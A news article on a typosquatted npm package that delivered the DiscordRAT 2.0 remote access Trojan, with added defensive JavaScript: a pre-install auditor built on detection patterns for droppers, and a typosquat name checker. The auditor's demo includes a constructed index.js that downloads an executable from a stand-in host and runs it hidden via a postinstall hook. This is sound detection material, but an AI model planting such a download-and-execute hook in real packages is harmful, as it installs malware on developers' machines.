Researchers have discovered a malicious npm package that hides a full-service Discord remote access Trojan (RAT) with rootkit functionality. Known as “DiscordRAT 2.0,” the malware is a turnkey hacking tool that puts capable remote access within reach of newcomers to the hacking scene, and, delivered through a look-alike package, it significantly lowers the barrier to entry for supply chain attacks on open-source software.
The deceptive package, “node-hide-console-windows,” mimicked the legitimate “node-hide-console-window,” differing from it by a single trailing letter. The legitimate package is a simple module that toggles an application’s console window visibility and is downloaded roughly 300 times per week. The copycat was made to look almost identical, down to 10 separate published versions matching the original’s version count, and it was downloaded about 700 times before it was taken down.
Ashlee Benge, director of threat intelligence advocacy at ReversingLabs, acknowledges the benefits of open-source software but points out how easily malicious behavior can be concealed within it: the same openness that makes the ecosystem useful gives malicious actors an effortless place to hide their activities.
Researchers from ReversingLabs first spotted the copycat, which was uploaded on August 25 by a new account with no ties to any other npm project. On inspection they found unobfuscated malicious code in its “index.js” file. Once executed, the code downloaded an executable that turned out to be a copy of DiscordRAT 2.0.
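As an added example, not code from the article or from ReversingLabs: a small static pre-install audit in JavaScript that looks for the download-and-execute pattern described above (a network fetch, a file written to disk, a child process started, a Windows executable name) and for package.json lifecycle hooks that would run such code automatically during npm install. The sample index.js files and manifests are constructed for the demo and are not the real node-hide-console-windows payload; the rule weights and the verdict threshold are assumptions to be tuned against your own packages.

```javascript
// Added example (not the article's or ReversingLabs' code): static audit of an
// npm package's manifest and source for dropper-style behaviour.

// Each rule is a regex over source text plus a weight; hits are summed.
// Weights are assumptions chosen so that several traits together trip the verdict.
const SOURCE_RULES = [
  { id: 'child_process', re: /require\(\s*['"]child_process['"]\s*\)/, weight: 3 },
  { id: 'exec_or_spawn', re: /\b(exec|execSync|spawn|spawnSync|execFile)\s*\(/, weight: 2 },
  { id: 'http_download', re: /\b(https?\.get|fetch|axios\.get|request)\s*\(\s*['"`]https?:\/\//, weight: 2 },
  { id: 'write_file',    re: /\b(writeFileSync|createWriteStream|writeFile)\s*\(/, weight: 1 },
  { id: 'exe_extension', re: /\.(exe|dll|scr|bat|cmd|ps1)\b/i, weight: 2 },
  { id: 'hidden_window', re: /windowsHide\s*:\s*true/, weight: 1 },
];

// npm runs these scripts automatically during install, so code placed here
// executes without the victim ever importing the module.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

function scanSource(src) {
  return SOURCE_RULES.filter(r => r.re.test(src)).map(r => ({ id: r.id, weight: r.weight }));
}

function scanManifest(pkg) {
  const scripts = pkg.scripts || {};
  return LIFECYCLE_HOOKS.filter(h => h in scripts)
    .map(h => ({ id: 'hook:' + h, weight: 3, command: scripts[h] }));
}

// files: { "<path in tarball>": "<source text>" }
function auditPackage(pkg, files) {
  const findings = scanManifest(pkg);
  for (const [name, src] of Object.entries(files)) {
    for (const f of scanSource(src)) findings.push({ file: name, ...f });
  }
  const score = findings.reduce((s, f) => s + f.weight, 0);
  // Threshold of 6 is an assumption: roughly "a fetch plus a process launch".
  return { score, verdict: score >= 6 ? 'suspicious' : 'ok', findings };
}

// Constructed sample of a dropper-style index.js (not the real payload).
const SAMPLE_DROPPER = `
const https = require('https');
const fs = require('fs');
const path = require('path');
const os = require('os');
const { execFile } = require('child_process');
const out = path.join(os.tmpdir(), 'update.exe');
https.get('https://example.invalid/update.exe', res => {
  res.pipe(fs.createWriteStream(out))
     .on('finish', () => execFile(out, [], { windowsHide: true }));
});
`;
const SAMPLE_MANIFEST = {
  name: 'node-hide-console-windows', version: '1.0.9',
  scripts: { postinstall: 'node index.js' },
};

// Constructed benign sample: what a console-toggling module might look like.
const SAMPLE_BENIGN = `
const native = require('./build/Release/console.node');
module.exports = { hide: () => native.hide(), show: () => native.show() };
`;
const BENIGN_MANIFEST = {
  name: 'node-hide-console-window', version: '1.0.9',
  scripts: { test: 'node test.js' },
};

console.log(auditPackage(SAMPLE_MANIFEST, { 'index.js': SAMPLE_DROPPER }).verdict); // suspicious
console.log(auditPackage(BENIGN_MANIFEST, { 'index.js': SAMPLE_BENIGN }).verdict);  // ok
```

Run it over the extracted contents of a tarball (npm pack, then untar) before the package ever reaches npm install. The regexes are deliberately simple; a packed or minified dropper can dodge them, which is why the lifecycle-hook check and a read of small packages' source still matter.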
DiscordRAT 2.0 is a compact, C#-based remote hacking tool whose GitHub page describes it as “for educational use only.” Doubts persist about its genuine intent. Benge notes that many such tools are released under an educational label yet are readily available for anyone to download from platforms like GitHub and use as malware; with them, even individuals with minimal knowledge or expertise can launch email campaigns carrying malicious attachments.
What makes DiscordRAT 2.0 noteworthy is its user-friendly interface. Each victim is managed through its own Discord channel, and the tool provides dozens of commands designed for easy use, enabling the theft of credentials, manipulation of files, termination of processes, and even bluescreening the host computer.
Its most significant feature, however, is the “!rootkit” command. When triggered, it deploys a second piece of open-source malware, the r77 rootkit, which hides TCP and UDP connections, files and directories, processes and their CPU usage, and more. An attacker with administrative privileges can use the rootkit to establish persistence on a host, carry out malicious activity, and reach highly privileged data, all without extensive knowledge or expertise.
The existence of a full-service, turnkey RAT with these capabilities shows how little skill an attacker needs to conduct a relatively sophisticated attack. As Benge points out, that accessibility opens the door to aspiring attackers, especially since it offers them an easy path to a quick profit.
While the discovery of this typosquatting package is concerning, it also underscores the need for stronger security measures across the open-source software supply chain. Developers should verify a package before installing it: compare the name character by character against the one they intend, look at the publisher’s account age and other packages, check the download count against the expected one, and inspect the package’s lifecycle scripts and source, since preinstall and postinstall hooks run arbitrary code during installation (installing with the --ignore-scripts flag prevents that, though code in the module itself still runs on import). Keeping security software up to date and monitoring for suspicious or unauthorized activity remain essential to mitigating this kind of attack.
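The name check itself, as an added example rather than code from the article or from any npm tooling: it measures how far a candidate package name is from a short allow-list of packages the project already trusts, using optimal string alignment distance so that a single added letter (the trailing “s” in this case), a typo, or two swapped characters all register. The allow-list, the normalisation rules and the distance threshold are assumptions; in practice the list would come from the project’s own lockfile or a curated set of popular packages.

```javascript
// Added example (not the article's or any npm tool's code): typosquat check
// for an npm package name against a constructed allow-list.

// Optimal string alignment distance: insert, delete, substitute, or swap two
// adjacent characters, each costing 1.
function osaDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // adjacent transposition
      }
    }
  }
  return d[a.length][b.length];
}

// Drop the scope and separators so "cross-env" and "crossenv" compare as equal
// (distance 0), which is itself a classic squatting pattern.
function normalise(name) {
  return name.toLowerCase().replace(/^@[^/]+\//, '').replace(/[-_.]/g, '');
}

// Constructed allow-list for the demo (assumption).
const KNOWN_PACKAGES = ['node-hide-console-window', 'lodash', 'express', 'cross-env'];

// Returns null when the name is exactly a trusted package or nothing is close;
// otherwise the closest trusted name and its distance (0 = separators only).
function checkTyposquat(candidate, known = KNOWN_PACKAGES, maxDistance = 2) {
  if (known.includes(candidate)) return null;
  const c = normalise(candidate);
  let best = null;
  for (const k of known) {
    const dist = osaDistance(c, normalise(k));
    if (dist <= maxDistance && (best === null || dist < best.distance)) {
      best = { candidate, lookalikeOf: k, distance: dist };
    }
  }
  return best;
}

console.log(checkTyposquat('node-hide-console-windows'));
// { candidate: 'node-hide-console-windows', lookalikeOf: 'node-hide-console-window', distance: 1 }
console.log(checkTyposquat('node-hide-console-window')); // null
```

A hit is not proof of malice (legitimate forks also pick adjacent names), so treat it as a prompt to look at the publisher, the download count and the source before installing, not as a verdict on its own.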